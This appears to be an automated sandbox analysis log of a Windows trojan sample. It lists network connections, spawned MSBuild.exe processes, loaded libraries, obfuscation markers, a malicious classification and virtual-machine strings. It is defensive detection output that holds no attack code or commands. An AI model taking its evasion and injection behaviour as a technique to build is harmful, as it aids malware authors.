Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60463
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60341
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60462
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60340
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60461
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60460
Source: unknown Network traffic detected: HTTP traffic on port 60287 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60474 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60349
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60348
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60469
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60347
Source: unknown Network traffic detected: HTTP traffic on port 60382 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60468
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60346
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60467
Source: unknown Network traffic detected: HTTP traffic on port 60359 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60441 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60480
Source: unknown Network traffic detected: HTTP traffic on port 60464 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60336 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60356
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60477
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60355
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60476
Source: unknown Network traffic detected: HTTP traffic on port 60265 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60354
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60475
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60353
Source: unknown Network traffic detected: HTTP traffic on port 60429 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60474
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60352
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60473
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60351
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60472
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60350
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60471
Source: unknown Network traffic detected: HTTP traffic on port 60288 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60470
Source: unknown Network traffic detected: HTTP traffic on port 60303 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60381 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60359
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60358
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60479
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60357
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60478
Source: unknown Network traffic detected: HTTP traffic on port 60299 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60501 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60370
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60491
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60490
Source: unknown Network traffic detected: HTTP traffic on port 60314 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60243 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60370 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60486 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60246
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60367
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60488
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60245
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60366
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60487
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60244
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60365
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60486
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60243
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60364
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60485
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60363
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60242
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60484
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60241
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60362
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60483
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60361
Source: unknown Network traffic detected: HTTP traffic on port 60407 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60482
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60360
Source: unknown Network traffic detected: HTTP traffic on port 60430 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60481
Source: unknown Network traffic detected: HTTP traffic on port 60497 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60254 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60325 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60249
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60248
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60369
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60247
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60368
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60489
Source: unknown Network traffic detected: HTTP traffic on port 60443 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60466 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60248 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60420 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60283 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60260 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60489 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60500 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60408 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60328 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60305 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60419 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60316 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60375 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60432 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60294 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60340 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60386 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60478 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60374 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60397 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60454 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60284 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60431 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60341 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60272 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60465 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60490 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60295 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60352 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60247 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60261 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60304 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60329 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60363 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60273 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60296 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60338 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60299
Source: unknown Network traffic detected: HTTP traffic on port 60456 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60298
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60297
Source: unknown Network traffic detected: HTTP traffic on port 60433 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60296
Source: unknown Network traffic detected: HTTP traffic on port 60410 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60295
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60294
Source: unknown Network traffic detected: HTTP traffic on port 60362 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60467 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60385 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60421 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60350 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60488 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60262 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60396 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60409 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60327 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60306 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60499 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60384 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60422 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60317 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60246 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60351 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60477 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60274 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60444 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60373 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60339 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60455 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60285 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60319 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60320 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60257 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60389 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60400 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60343 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60366 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60492 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60411 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60280 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60446 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60354 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60481 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60457 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60445 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60470 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60269 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60412 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60281 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60332 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60468 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60355 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60307 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60423 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60377 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60482 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60318 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60321 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60292 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60434 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60258 -> 443
Source: unknown HTTPS traffic detected: 13.107.253.45:443 -> 192.168.2.4:49743 version: TLS 1.2
Detected potential crypto function
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_00582021 0_2_00582021
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_0058729C 0_2_0058729C
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_0059D39B 0_2_0059D39B
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_0059572C 0_2_0059572C
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_005D094F 0_2_005D094F
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_0058CAF2 0_2_0058CAF2
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_0059BB36 0_2_0059BB36
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_00593C92 0_2_00593C92
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_00581D79 0_2_00581D79
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_0058FEF0 0_2_0058FEF0
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 004045C0 appears 317 times
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: String function: 00587B80 appears 49 times
One or more processes crash
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7000 -s 272
Sample file is different than original file name gathered from version info
Source: 5rVhexjLCx.exe, 00000000.00000000.1804354494.00000000005FC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameproquota.exej% vs 5rVhexjLCx.exe
Source: 5rVhexjLCx.exe Binary or memory string: OriginalFilenameproquota.exej% vs 5rVhexjLCx.exe
Uses 32bit PE files
Source: 5rVhexjLCx.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 5rVhexjLCx.exe Static PE information: Section: .data ZLIB complexity 0.98996875
Source: classification engine Classification label: mal100.troj.evad.winEXE@6/5@0/1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\INAM1FG6.htm Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7000
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\a5fcf641-bfc1-4c7d-acee-a6a4cdc4e359 Jump to behavior
Source: 5rVhexjLCx.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 5rVhexjLCx.exe ReversingLabs: Detection: 31%
Source: unknown Process created: C:\Users\user\Desktop\5rVhexjLCx.exe "C:\Users\user\Desktop\5rVhexjLCx.exe"
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7000 -s 272
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: 5rVhexjLCx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 5rVhexjLCx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 5rVhexjLCx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 5rVhexjLCx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 5rVhexjLCx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 5rVhexjLCx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 5rVhexjLCx.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: 5rVhexjLCx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 5rVhexjLCx.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 5rVhexjLCx.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 5rVhexjLCx.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 5rVhexjLCx.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 5rVhexjLCx.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0041C03D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 2_2_0041C03D
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_005871AD push ecx; ret 0_2_005871C0
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_005C7F0D push ecx; ret 0_2_005C7F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0041B035 push ecx; ret 2_2_0041B048
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\5rVhexjLCx.exe API coverage: 4.2 %
Source: C:\Users\user\Desktop\5rVhexjLCx.exe Code function: 0_2_00599ABF FindFirstFileExW, 0_2_00599ABF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00401160 GetSystemInfo, 2_2_00401160
Source: Amcache.hve.5.dr Binary or memory string: VMware
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: MSBuild.exe, 00000002.00000002.1821798239.00000000016C4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1821798239.0000000001667000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: MSBuild.exe, 00000002.00000002.1821798239.00000000016C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: Amcache.hve.5.dr Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Generation Counter
